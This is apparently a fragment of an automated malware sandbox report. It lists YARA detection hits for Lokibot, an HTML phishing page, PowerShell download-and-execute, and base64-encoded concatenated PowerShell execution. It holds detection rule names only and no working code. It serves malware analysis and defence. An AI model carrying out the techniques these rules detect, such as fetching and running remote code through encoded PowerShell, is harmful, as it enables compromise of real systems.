JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |